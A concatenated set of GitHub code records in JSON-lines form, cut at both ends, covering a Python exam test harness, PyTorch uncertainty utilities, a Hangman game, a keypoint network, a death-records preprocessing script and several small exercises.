************************************\"\"\"\n\n# Please note: The tests below are not exhaustive, meaning they do not cover all possible test cases.\n# Make sure you write your own cases as well to fully test your code.\n\n\nif __name__ == '__main__':\n # ** TASK A1 **\n print(f'A1: Executing int method in calculator. Expected value: (2, -4, 0).')\n print(f\"Returned value: {calculator_int()} \\n\")\n # **************\n\n # ** TASK A2 **\n print(f\"A2: Executing factorial method in calculator. \"\n f\"Expected value: (1, 1, 2.0, 6.0, 405.4287934927351, 'Error', -1, 'Error') .\")\n print(f\"Returned value: {calculator_factor()} \\n\")\n # **************\n\n # ** TASK A3 **\n print(f'A3: Executing enqueue of Qlist. Expected value: [6, 4, 6, 9, 4].')\n print(f\"Returned value: {qlist_enqueue()} \\n\")\n # **************\n\n # ** TASK A4 **\n print(f'A4: Executing dequeue of Qlist. Expected value: [2, 8, 2, 7].')\n print(f\"Returned value: {qlist_dequeue()} \\n\")\n # **************\n\n # ** TASK A5 **\n print(f'A5: Executing + operator on Qlist. Expected value: [5, 23, 2, 31, 9, 5, 56, 7].')\n print(f\"Returned value: {operator_overload()} \\n\")\n # **************\n\n # ** TASK A6 **\n print(f'A6: Executing smallest of PQlist. Expected value: 2.')\n print(f\"Returned value: {smallest_in_list()} \\n\")\n # **************\n\n # ** TASK A7 **\n print(f'A7: Executing copy of PQlist. Expected value: [7, 5, 8, 3, 9, 5].')\n print(f\"Returned value: {copy_list()} \\n\")\n # **************\n\n # ** TASK A8 **\n print(f'A8: Executing pqlist_complexity_answer.')\n print(f'Your answer to A7: {pqlist_complexity_answer()} \\n')\n # **************\n\n # ** TASK A9 **\n print(f'A9: Executing enqueue of PQbst. Expected value: < 1 4 4 4 7 8 8 10 >.')\n print(f\"Returned value: {pqbst_enqueue()} \\n\")\n # **************\n\n # ** TASK A10 **\n # The method takes two integers and uses it as an\n # interval to calculate Fibonacci numbers. It should return a dictionary\n # with n as key and the nth Fibonacci number as value.\n print('A10: Executing multi_fib. Expected value: '\n '{'\n '30: 832040,'\n '31: 1346269, '\n '32: 2178309, '\n '33: 3524578, '\n '34: 5702887, '\n '35: 9227465, '\n '36: 14930352, '\n '37: 24157817, '\n '38: 39088169'\n '}.')\n print(\"\\033[31m -- Uncomment the next line to test this method (can be slow!) -- \\033[0m \\n\")\n #print(f\"Returned value: {multi_fib()} \\n\")\n # **************\n\n # ** TASK B1 **\n print(f'B1: Executing print_pq. Expected value: 3 2 7 3 5 2 .')\n print(f\"Returned value: {print_pq()} \\n\")\n # **************\n\n # ** TASK B2 **\n quote = \"It’s hardware that makes a machine fast. It’s software that makes a fast machine slow.\"\n\n # The method letter_combo takes a string and two letters as arguments\n # and return the number of occurrences where letter 1 directly precedes letter 2.\n print(f'B2: Executing letter_combo. Expected value: 4.')\n print(f\"Returned value: {letter_combo(quote, 'm', 'a')} \\n\")\n # **************\n\n # ** TASK B3 **\n print(f'B3: Executing dequeue of PQbst. Expected value: < 7 9 12 18 > .')\n print(f\"Returned value: {pqbst_dequeue()} \\n\")\n # **************\n\n # ** TASK B4 **\n print(f'B4: Executing pqbst_complexity_answer.')\n print(f'Your answer to B4: {pqbst_complexity_answer()} \\n')\n # **************\n\n # ** TASK B5 **\n customer_indexes = [12, 19, 27, 48, 51, 66, 68, 80, 91, 101]\n\n # The method calculate_occurrences takes a list of customer indexes\n # along with two letters as input arguments. It should return the\n # total of occurrences where letter 1 precedes letter 2 in the customer about info.\n print(f'B5: Executing calculate_occurrences. Expected value: 27.')\n print(f\"Returned value: {calculate_occurrences(customer_indexes, 'n', 'i')} \\n\")\n # **************\n","repo_name":"HampusFors18/PythonProggII","sub_path":"exam20201217/answers.py","file_name":"answers.py","file_ext":"py","file_size_in_byte":10174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"13854786284","text":"import torch\nimport numpy as np\n\ndef mfij_predict(args,\n loaders,\n dimensions,\n num_train=45000,\n block_size=1000):\n '''\n Compute mean-field infinitesimal jackknife predictions\n :param args: hyper-parameters\n :param loaders: a dictionary with key as the dataset name, and value as a dictionary.\n The value dictionary contains 2 entries. One key 'features' has value of penultimate layer features,\n and another key 'logits_mean' has value of logits as in standard softmax.\n For example, loaders={'heldout': {'features': pen_features_heldout, 'logits_mean': logits_heldout},\n 'test': {'features': pen_features_test, 'logits_mean': logits_test}}.\n :param dimensions: [softmax_input_dim, softmax_output_dim]\n :param num_train: number of training samples\n :param block_size: batch size for parallelization\n :return:\n a dictionary with keys the same as loaders keys, and values of mfij predictions.\n '''\n hatc = eval(args.lambda0)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # apply temp_ens\n U_cov = (args.cov / (args.temp_ens * num_train)).to(device)\n\n U_cov_4d = torch.reshape(U_cov, [dimensions[1], dimensions[0]+1,\n dimensions[1], dimensions[0]+1]).permute([0, 2, 1, 3])\n probs_mfij = dict()\n for data_key, per_sample_preacts in loaders.items():\n logits_mean = per_sample_preacts['logits_mean'].to(device)\n dimN, dimD = logits_mean.shape\n logits_cov = torch.zeros((dimN, dimD, dimD))\n for s_idx in range(0, dimN, block_size):\n logits_cov[s_idx:s_idx+block_size] = torch.einsum('nk,ijkl,nl->nij',\n per_sample_preacts['features'][s_idx:s_idx+block_size].to(device),\n U_cov_4d.to(device),\n per_sample_preacts['features'][s_idx:s_idx+block_size].to(device)).cpu().detach()\n logits_cov = logits_cov.to(device)\n probs_mfij[data_key] = batch_mf(args, logits_mean, logits_cov, hatc)\n return probs_mfij\n\ndef mfij_predict_kron_approx(args,\n loaders,\n block_size=1000):\n hatc = eval(args.lambda0)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n probs_mfij = dict()\n for data_key, per_sample_moments in loaders.items():\n dimN = per_sample_moments['logits_mean'].shape[0]\n print('num of data samples in', data_key, dimN)\n probs_mfij[data_key] = np.zeros((dimN, args.num_classes))\n logits_mat = per_sample_moments['logits_cov_mat'].to(device)\n for s_idx in range(0, dimN, block_size):\n logits_mean = per_sample_moments['logits_mean'][s_idx:s_idx + block_size].to(device)\n logits_scale = per_sample_moments['logits_cov_scale'][s_idx:s_idx + block_size].to(device)\n logits_cov = torch.einsum('n,ij->nij',\n logits_scale / args.temp_ens, # apply temp_ens\n logits_mat)\n probs_mfij[data_key][s_idx:s_idx + block_size] = batch_mf(args,\n logits_mean,\n logits_cov,\n hatc)\n return probs_mfij\n\ndef batch_mf(args,\n logits_mean,\n logits_cov,\n hatc):\n # apply temp_act\n if args.temp_act > 0:\n logits_mean /= args.temp_act\n # N x num_classes x num_classes\n logits_cov /= (args.temp_act ** 2)\n # N x num_classes x num_classes\n mukj = logits_mean.unsqueeze(2) - logits_mean.unsqueeze(1)\n if args.mf_approx == 'mf0':\n skj = torch.sqrt(1 + hatc * torch.diagonal(logits_cov, dim1=-2, dim2=-1)).unsqueeze(2)\n elif args.mf_approx == 'mf1':\n sigmak = torch.diagonal(logits_cov, dim1=-2, dim2=-1)\n sigmakj = sigmak.unsqueeze(2) + sigmak.unsqueeze(1)\n skj = torch.sqrt(1 + hatc * sigmakj)\n del sigmakj, sigmak\n elif args.mf_approx == 'mf2':\n sigmak = torch.diagonal(logits_cov, dim1=-2, dim2=-1)\n sigmakj = sigmak.unsqueeze(2) + sigmak.unsqueeze(1) - 2 * logits_cov\n skj = torch.sqrt(1 + hatc * sigmakj)\n del sigmakj, sigmak\n del logits_cov\n probs_unormalized = 1. / torch.sum(torch.exp(- mukj / skj), dim=-1)\n if args.temp_act > 0:\n # normalize\n probs = probs_unormalized / torch.sum(probs_unormalized, dim=1, keepdim=True)\n elif args.temp_act == 0:\n # do not normalize when args.temp_act == 0\n probs = probs_unormalized\n return probs.cpu().detach().numpy().astype(np.float64)","repo_name":"Sha-Lab/mean-field-infinitesimal-jackknife","sub_path":"Utils/mfij_utils.py","file_name":"mfij_utils.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"73496561647","text":"class Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n ans = []\n \n def backtrack(bit, res):\n \n if len(res) == len(nums):\n ans.append(res.copy())\n return\n \n for index in range(len(nums)):\n if bit & (1 << index) == 0:\n res.append(nums[index])\n backtrack(bit | (1 << index), res)\n res.pop()\n \n return ans\n \n return backtrack(0,[])","repo_name":"cypghost/A2SV","sub_path":"0046-permutations/0046-permutations.py","file_name":"0046-permutations.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"35931304157","text":"# Hangman Game\n#\n# The classic game of Hangman.The computer picks a random word\n# and the player wrong to guess it, one letter at a time.If the player\n# can't guess the word in time, the little stick figure gets hanged.\n\n# All credits to Michael Dawson to mention this code in his book -> Python for Absolute Beginners\n\nimport random\n# constants\nHANGMAN = (\n \"\"\"\n\t\t------\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| -+-\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-/\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-/\n\t\t| |\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-/\n\t\t| |\n\t\t| |\n\t\t| |\n\t\t| |\n\t\t|\n\t\t----------\n\"\"\",\n \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-/\n\t\t| |\n\t\t| |\n\t\t| | |\n\t\t| | |\n\t\t|\n\t\t----------\n\"\"\")\n\nMAX_WRONG = len(HANGMAN) - 1\n\n# feel free to change the words as per your needs\n\nWORDS = (\"CRYPTOGRAPHY\", \"WAVELENGTH\", \"CHAMPAGNE\", \"CONFIGURATION\", \"AMAZEMENT\")\n\nword = random.choice(WORDS)\n# the word to be guessed (using a random word from the above tuple)\n\nso_far = \"_\" * len(word)\n# one dash for each letter in word to be guessed (keeps track of current progress)\n\nwrong = 0\n# number of wrong guesses player has made\n\nused = []\n# letters already guessed\n\n# Main loop\nprint(\"\\n\tWelcome to Hangman. Good luck!\\n\")\nwhile wrong < MAX_WRONG and so_far != word:\n print(HANGMAN[wrong])\n print(\"\\nYou've used the following letters:\\n\", used)\n print(\"\\nSo far, the word is:\\n\\n\", so_far)\n\n # Getting the player's guess\n guess = input(\"\\n\\nEnter your guess: \")\n guess = guess.upper()\n while guess in used:\n print(\"You've already guessed the letter\", guess)\n guess = input(\"Enter your guess: \")\n guess = guess.upper()\n used.append(guess)\n\n # Checking the Guess\n if guess in word:\n print(\"\\nYes!\", guess, \"is in the word!\")\n # create a new so_far to include guess\n new = \"\"\n for i in range(len(word)):\n if guess == word[i]:\n new += guess\n else:\n new += so_far[i]\n so_far = new\n else:\n print(\"\\nSorry,\", guess, \"isn't in the word.\")\n wrong += 1\n\n# Ending the Game\nif wrong == MAX_WRONG:\n print(HANGMAN[wrong])\n print(\"\\nYou've been hanged!\")\nelse:\n print(\"\\nYou guessed it!\")\nprint(\"\\nThe word was\", word)\ninput(\"\\n\\nPress the enter key to exit.\")\n","repo_name":"sumana2001/Pybull","sub_path":"Hangman-Game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"2"} +{"seq_id":"38431051134","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ResBlockMobile(torch.nn.Module):\n \"\"\"ConvResBlockMobile: define a convolutional block with residual shortcut.\n It is the caller's duty to ensure the same size of input and output.\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=0, dilation=1, groups_d=1, groups_c=1, groups_r=1,\n padding_mode='zeros'):\n super(ResBlockMobile, self).__init__()\n self.convb = nn.Sequential(\n nn.BatchNorm2d(in_channels, affine=True),\n nn.ReLU(),\n nn.Conv2d(\n in_channels, out_channels, kernel_size=kernel_size,\n stride=stride, padding=padding, dilation=dilation,\n groups=groups_d, bias=False, padding_mode=padding_mode),\n nn.Conv2d(\n out_channels, out_channels, kernel_size=1,\n stride=1, padding=0, dilation=1,\n groups=groups_c, bias=True),\n )\n self.conv_residual = None\n if stride != 1 or in_channels != out_channels:\n self.conv_residual = nn.Conv2d(\n in_channels, out_channels, kernel_size=1,\n stride=stride, padding=0, groups=groups_r, bias=False)\n return\n\n def forward(self, input):\n if self.conv_residual != None:\n residual = self.conv_residual(input)\n else:\n residual = input\n out = self.convb(input)\n out += residual\n return out\n\nclass SEKDMobile(torch.nn.Module):\n \"\"\"SEDKMobile model definition, simultaneously detect and describe keypoints.\n \"\"\"\n def __init__(self):\n super(SEKDMobile, self).__init__()\n self.conv0 = nn.Conv2d(1, 32, kernel_size=3, padding=1, bias=True)\n self.resblock0 = nn.Sequential(\n ResBlockMobile(32, 32, kernel_size=3, padding=1,\n groups_d=32, groups_c=8),\n ResBlockMobile(32, 32, kernel_size=3, padding=1,\n groups_d=32, groups_c=8),\n ResBlockMobile(32, 32, kernel_size=3, padding=1,\n groups_d=32, groups_c=1),\n )\n\n self.resblock1 = nn.Sequential(\n ResBlockMobile(32, 64, kernel_size=3, stride=2, padding=1,\n groups_d=32, groups_c=16, groups_r=8),\n ResBlockMobile(64, 64, kernel_size=3, padding=1,\n groups_d=64, groups_c=16),\n ResBlockMobile(64, 64, kernel_size=3, padding=1,\n groups_d=64, groups_c=1),\n )\n\n self.resblock2 = nn.Sequential(\n ResBlockMobile(64, 128, kernel_size=3, stride=2, padding=1,\n groups_d=64, groups_c=32, groups_r=16),\n ResBlockMobile(128, 128, kernel_size=3, padding=1,\n groups_d=128, groups_c=32),\n ResBlockMobile(128, 128, kernel_size=3, padding=1,\n groups_d=128, groups_c=1),\n )\n\n self.deconv0 = nn.Sequential(\n nn.BatchNorm2d(128, affine=True),\n nn.ReLU(),\n nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1,\n groups=64, output_padding=1, bias=True),\n )\n\n self.deconv1 = nn.Sequential(\n nn.BatchNorm2d(64, affine=True),\n nn.ReLU(),\n nn.ConvTranspose2d(64, 32, kernel_size=3, stride=2, padding=1,\n groups=32, output_padding=1, bias=True),\n )\n\n self.detector = nn.Conv2d(\n 32, 2, kernel_size=3, padding=1, groups=2, bias=True)\n\n self.descriptor = ResBlockMobile(\n 128, 128, kernel_size=3, padding=1, groups_d=128, groups_c=32)\n\n return\n\n def forward(self, input):\n feature0_ = self.resblock0(self.conv0(input))\n feature1_ = self.resblock1(feature0_)\n feature2 = self.resblock2(feature1_)\n\n feature1 = feature1_ + self.deconv0(feature2)\n feature0 = feature0_ + self.deconv1(feature1)\n\n score = self.detector(feature0)\n descriptor = self.descriptor(feature2)\n\n return score, descriptor, feature0\n\n","repo_name":"aliyun/Self-Evolving-Keypoint-Demo","sub_path":"nets/sekd_mobile.py","file_name":"sekd_mobile.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"2"} +{"seq_id":"13266160396","text":"'''\nCreated on Nov 16, 2016\n\n@author: sarker\n'''\n\nimport os\nimport numpy as np\nimport DataIOFactory as dataIO\nimport csv\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import f1_score\nimport re\nimport Util as Util\nimport time\n\n\n'''\nColumn Names\nId ResidentStatus Education1989Revision Education2003Revision EducationReportingFlag MonthOfDeath Sex AgeType Age AgeSubstitutionFlag AgeRecode52 AgeRecode27 AgeRecode12 InfantAgeRecode22 PlaceOfDeathAndDecedentsStatus MaritalStatus DayOfWeekOfDeath CurrentDataYear InjuryAtWork MannerOfDeath MethodOfDisposition Autopsy ActivityCode PlaceOfInjury Icd10Code CauseRecode358 CauseRecode113 InfantCauseRecode130 CauseRecode39 NumberOfEntityAxisConditions NumberOfRecordAxisConditions Race BridgedRaceFlag RaceImputationFlag RaceRecode3 RaceRecode5 HispanicOrigin HispanicOriginRaceRecode\n''' \n\n'''\nThis method returns only those data-sample which has diesease. As mentioned in https://en.wikipedia.org/wiki/ICD-10#List\nThis method also write the data-samples into files.\n'''\ndef getOnlyDiseaseData(inputFileName, outputFileName):\n\n dataMatrixWithLabel = dataIO.getDataMatrixFromCSV(inputFileName)\n \n '''ICD10Code = column 24'''\n icd10Codes = dataMatrixWithLabel[:, 24]\n \n dataMatrixWithOnlyDieseases = [];\n \n '''pattern to match'''\n pattern = re.compile('[A-R]+')\n \n counter = 0\n \n '''write to file''' \n with open(outputFileName, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n for icd10Code in icd10Codes:\n if(re.match(pattern, icd10Code)):\n dataMatrixWithOnlyDieseases.append(dataMatrixWithLabel[counter])\n writer.writerow(dataMatrixWithLabel[counter])\n counter += 1\n \n \n dataMatrixWithOnlyDieseases = np.array(dataMatrixWithOnlyDieseases)\n return dataMatrixWithOnlyDieseases \n\n\n'''This method maps the string value to integer values'''\ndef changeStringToInteger(fileName, cols, hasColumnHeader):\n print('################# changeStringToInteger() started##################')\n start_time = time.time()\n dataMatrixWithLabel = dataIO.getDataMatrixFromCSV(fileName)\n \n '''remove the column_Header/label_of_the_column from the data'''\n if(hasColumnHeader):\n dataMatrix = dataMatrixWithLabel[1:]\n \n for i in cols:\n \n '''Column 5 = Sex: \n F = 0\n M = 1\n '''\n if(i == 6):\n c6 = []\n for rowData in dataMatrix[:, i]:\n if(rowData == 'F'):\n c6.append(0)\n else:\n c6.append(1)\n \n '''Column 15 = Marital Status\n S = Never married, single = 0\n M = Married = 1\n W = Widowed = 2\n D = Divorced = 3\n U = Marital Status unknown = 4'''\n if(i == 15):\n c15 = []\n for rowData in dataMatrix[:, i]:\n if(rowData == 'S'):\n c15.append(0)\n elif(rowData == 'M'):\n c15.append(1)\n elif(rowData == 'W'):\n c15.append(2)\n elif(rowData == 'D'):\n c15.append(3)\n elif(rowData == 'U'):\n c15.append(4)\n \n '''Column 18 = InjuryAtWork\n Y = Yes = 0\n N = No = 1\n U = Unknown = 2'''\n if(i == 18):\n c18 = []\n for rowData in dataMatrix[:, i]:\n if(rowData == 'Y'):\n c18.append(0)\n elif(rowData == 'N'):\n c18.append(1)\n elif(rowData == 'U'):\n c18.append(2)\n \n '''Column 20 = Method Of Desposition\n B = Burial = 0\n C = Cremation = 1\n O = Other = 2\n U = Unknown = 3\n E = Unknown = 3\n R = Unknown = 3'''\n if(i == 20):\n c20 = []\n for rowData in dataMatrix[:, i]:\n if(rowData == 'B'):\n c20.append(0)\n elif(rowData == 'C'):\n c20.append(1)\n elif(rowData == 'O'):\n c20.append(2)\n elif(rowData == 'U'):\n c20.append(3)\n elif(rowData == 'E'):\n c20.append(3)\n elif(rowData == 'R'):\n c20.append(3)\n else:\n c20.append(3)\n \n \n '''Column 21 = Autopsy: \n Y = Yes = 0\n N = No = 1\n U = Unknown = 2\n ''' \n if(i == 21):\n c21 = []\n for rowData in dataMatrix[:, i]:\n if(rowData == 'Y'):\n c21.append(0)\n elif(rowData == 'N'):\n c21.append(1)\n elif(rowData == 'U'):\n c21.append(2)\n else:\n c21.append(2)\n \n \n '''replace the values into main matirx''' \n dataMatrix[:, 6] = c6\n dataMatrix[:, 15] = c15\n dataMatrix[:, 18] = c18\n dataMatrix[:, 20] = c20\n dataMatrix[:, 21] = c21\n \n print('################# changeStringToInteger() finished ##################')\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n return dataMatrix\n\n'''change output variable ICD10 codes into integer values\nExplanantion: https://en.wikipedia.org/wiki/ICD-10#List\n''' \n\ndef mapICD10CodetoInteger(ICD10Codes):\n print('################# mapICD10CodetoInteger() started ##################')\n start_time = time.time()\n \n integerCodes = []\n for icd10Code in ICD10Codes:\n if(icd10Code.startswith('A') or icd10Code.startswith('B')):\n integerCodes.append(0)\n elif(icd10Code.startswith('C') or icd10Code.startswith('D0') or icd10Code.startswith('D1') or icd10Code.startswith('D2') or icd10Code.startswith('D3') or icd10Code.startswith('D4')):\n integerCodes.append(1)\n elif(icd10Code.startswith('D5') or icd10Code.startswith('D6') or icd10Code.startswith('D7') or icd10Code.startswith('D8')):\n integerCodes.append(2)\n elif(icd10Code.startswith('E')):\n integerCodes.append(3)\n elif(icd10Code.startswith('F')):\n integerCodes.append(4)\n elif(icd10Code.startswith('G')):\n integerCodes.append(5)\n elif(icd10Code.startswith('H0') or icd10Code.startswith('H1') or icd10Code.startswith('H2') or icd10Code.startswith('H3') or icd10Code.startswith('H4') or icd10Code.startswith('H5')):\n integerCodes.append(6)\n elif(icd10Code.startswith('H6') or icd10Code.startswith('H7') or icd10Code.startswith('H8') or icd10Code.startswith('H9')):\n integerCodes.append(7)\n elif(icd10Code.startswith('I')):\n integerCodes.append(8)\n elif(icd10Code.startswith('J')):\n integerCodes.append(9)\n elif(icd10Code.startswith('K')):\n integerCodes.append(10)\n elif(icd10Code.startswith('L')):\n integerCodes.append(11)\n elif(icd10Code.startswith('M')):\n integerCodes.append(12)\n elif(icd10Code.startswith('N')):\n integerCodes.append(13)\n elif(icd10Code.startswith('O') or icd10Code.startswith('0')):\n integerCodes.append(14)\n elif(icd10Code.startswith('P')):\n integerCodes.append(15)\n elif(icd10Code.startswith('Q')):\n integerCodes.append(16)\n elif(icd10Code.startswith('R')):\n integerCodes.append(17)\n else:\n print(icd10Code)\n \n print('################# mapICD10CodetoInteger() finished ##################')\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n \n return integerCodes\n\n\n'''Be sure about where you has the file and where you want to put the resultant file'''\nactualDataFile = '../data/DeathRecords/DeathRecords.csv'\ndeathRecordsOnlyDiseaseFile = '../processedData/DeathRecordsOnlyDisease.csv'\ndeathRecordsConvertedToIntegerFile = '../processedData/DeathRecordsConvertedToInteger.csv'\nactualBalancedDataFile = '../processedData/balancedDataRaw.csv'\nbalancedDataConvertedToIntegerFile = '../processedData/balancedDataConvertedToInteger.csv'\n\n'''Get and Write only diesease data samples'''\n# getOnlyDiseaseData(actualDataFile, deathRecordsOnlyDiseaseFile)\n\n'''transform the data into integer format. only the input features.'''\ncols = [6, 15, 18, 20, 21]\ndataMatrix = changeStringToInteger(actualBalancedDataFile , cols , True) \n \n'''change the output or icd10codes''' \ndataMatrix[ : , 24] = mapICD10CodetoInteger(dataMatrix[:, 24])\n\n'''write the converted values to file'''\nwith open(balancedDataConvertedToIntegerFile, 'w') as csvfile:\n writer = csv.writer(csvfile , delimiter=',')\n for row in dataMatrix:\n writer.writerow(row) \n \n\n# \n# # #Manner of Death, column 19 \n# '''take death of manner as output value'''\n# Y = dataMatrix[:, 16]\n# \n# '''take inputs upto 31. after 31 the values are not convertible to float'''\n# X = dataMatrix[: , range(0 , 6) ] \n# '''delete column 19. i.e delete deathManner column from input'''\n# #X = np.delete(dataMatrix, [0, 16], axis=1)\n# \n# \n# '''convert to float'''\n# X = dataIO.convertDatatoFloat(X)\n# Y = dataIO.convertDatatoFloat(Y)\n# \n# \n# '''Split into train, test and validation'''\n# trainX, trainY, validationX, validationY, testX, testY = dataIO.splitTrainValidateAndTestData(X, Y, 0.6, 0.2, 0.2)\n# \n# print(trainX.shape, trainY.shape)\n# \n# clf = MLPClassifier()\n# \n# clf.fit(trainX, trainY)\n# \n# predictedY = clf.predict(testX)\n# \n# accuracy = accuracy_score(testY, predictedY)\n# \n# confusionMatrix = confusion_matrix(testY , predictedY)\n# \n# f1Score = f1_score(testY, predictedY, average='weighted')\n# \n# print('confusionMatrix: ', confusionMatrix)\n# print('f1Score: ', f1Score)\n# \n# \n# \n# \n# \n","repo_name":"md-k-sarker/Predicting-Health-Insurance-Cost","sub_path":"src/PreProcessData.py","file_name":"PreProcessData.py","file_ext":"py","file_size_in_byte":10388,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"2"} +{"seq_id":"36521815736","text":"#Devise a way to find an element in the rotated array in O(log n) time.\n\ndef findPivot(arr:list, haystack: list, needle: any):\n print(haystack, end=\"\\t\")\n sizeOfList = len(haystack)\n print(\"size => \", sizeOfList, end=\"\\t\")\n if sizeOfList <= 1:\n return -1\n\n middleIndex = sizeOfList//2\n middleIndexEle = haystack[middleIndex]\n\n print(middleIndex, middleIndexEle, sep=\" => \")\n \n # print(type(needle), middleIndex, type(haystack[middleIndex]), sep=' => ')\n if (needle == middleIndexEle):\n # print('===========================================')\n return middleIndex + (sizeOfList-1)\n elif needle < middleIndexEle:\n return findPivot(arr, arr[middleIndex::], needle)\n elif needle > middleIndexEle:\n return findPivot(arr, arr[0:middleIndex], needle)\n \n\n\n# def searchEle(arr, meedle, index):\n\nif __name__ == '__main__':\n l = list(map(int,input('Enter space sperated values: ').split(' ')))\n d = int(input(f'please entry number to search : '))\n \n r = findPivot(l, l, d)\n print(r)\n","repo_name":"pawanab/python-ds","sub_path":"problem-solving/search-in-sorted-roated-list.py","file_name":"search-in-sorted-roated-list.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38781509714","text":"#!/usr/bin/python\n\nimport simplejson as json\nfrom sys import stdin, stderr, stdout\nimport traceback\nimport re\nimport sys\n\n\ndef getVerdicts(tests, testData):\n verdicts = {}\n for i in tests:\n s = testData[i-1][\"verdict\"]\n if s not in verdicts:\n verdicts.update({s : 0})\n verdicts.update({s : verdicts[s] + 1})\n return ','.join(['%d %s' % (verdicts[j], j) for j in verdicts])\n\n\ndef getIfHas(d, v):\n if v in d:\n return d[v]\n return None\n\ntry:\n testData = json.load(stdin)[\"tests\"]\n\n important = [\"testName\", \"verdict\", \"message\"]\n tests = [ {j : getIfHas(i,j) for j in important} for i in testData]\n\n tests.sort(key = lambda x : x [\"testName\"])\n tests = [ tests[i] for i in range(len(tests)) if i == 0 or tests[i][\"testName\"] != tests[i-1][\"testName\"] ]\n\n answer = re.findall(\"\\$.*\\$\", tests[0][\"message\"].replace('\\n', ' '))\n if (len(answer) != 0):\n stdout.write(answer[0].replace(\"$\",\"\") + '\\n')\n # sys.exit(4)\n\nexcept Exception as e:\n stdout.write('\\n')\n traceback.print_exc(file=stderr)\n","repo_name":"atolstikov/yacontest-cheatsheet","sub_path":"ml-score-prediction/postprocessor.py","file_name":"postprocessor.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"} +{"seq_id":"38223429036","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n\n @ Author : pengj\n @ date : 2020/7/23 14:14\n @ IDE : PyCharm\n @ GitHub : https://github.com/JackyPJB\n @ Contact : pengjianbiao@hotmail.com\n-------------------------------------------------\n Description : \n-------------------------------------------------\n\"\"\"\n\n__author__ = 'Max_Pengjb'\n\nimport numpy as np\nimport cv2\nimport os\nimport time\nimport xml.etree.ElementTree as ET\nfrom opencv_learn.my_perspective_transform import perspective_transform\nfrom opencv_learn.my_flip import flip_x\nfrom opencv_learn.draw_boxes import draw_boxes, draw_boxes_with_labels\nfrom opencv_learn.my_crop_scale import crop_scale\nfrom opencv_learn.my_save_jpg_xml import save_jpg_xml\n\nimport json\n\nallFileNum = 0\n\n\ndef get_all_jgp_xml_couple(folder_path: str) -> list:\n \"\"\"\n :param folder_path: 读取文件的目录地址\n :return: 返回所有的 (图片-xml标注)\n \"\"\"\n # 所有文件\n file_xml_couple_dict = dict()\n # 返回一个列表,其中包含在目录条目的名称(google翻译)\n files = os.listdir(folder_path)\n for file_name in files:\n # 判断是 xml 或者是 jpg,png 等就放进去\n if os.path.isfile(folder_path + '/' + file_name):\n name, file_type = os.path.splitext(file_name)\n if name not in file_xml_couple_dict:\n # 这个名字的图片或者xml从来没有出现过\n file_xml_couple_dict[name] = [None, None]\n # 判断文件是图片还是标注xml文件\n if file_type in {'.jpg', '.png', '.jpeg'}:\n # 后缀名可以再添加\n if file_xml_couple_dict[name][0] is not None:\n print('文件夹中包含多张以 ', file_xml_couple_dict[name], '为名称的图片,请检查!')\n else:\n file_xml_couple_dict[name] = [file_name, file_xml_couple_dict[name][1]]\n elif file_type in {'.xml'}:\n # 标注文件\n file_xml_couple_dict[name] = [file_xml_couple_dict[name][0], file_name]\n # print(file_xml_couple_dict)\n return list(file_xml_couple_dict.values())\n\n\ndef get_all_xmls(folder_path: str) -> list:\n \"\"\"\n :param folder_path: 读取文件的目录地址\n :return: 返回所有的 (xml标注)\n \"\"\"\n # 所有文件\n xmls = []\n # 返回一个列表,其中包含在目录条目的名称(google翻译)\n files = os.listdir(folder_path)\n for file_name in files:\n # 判断是 xml 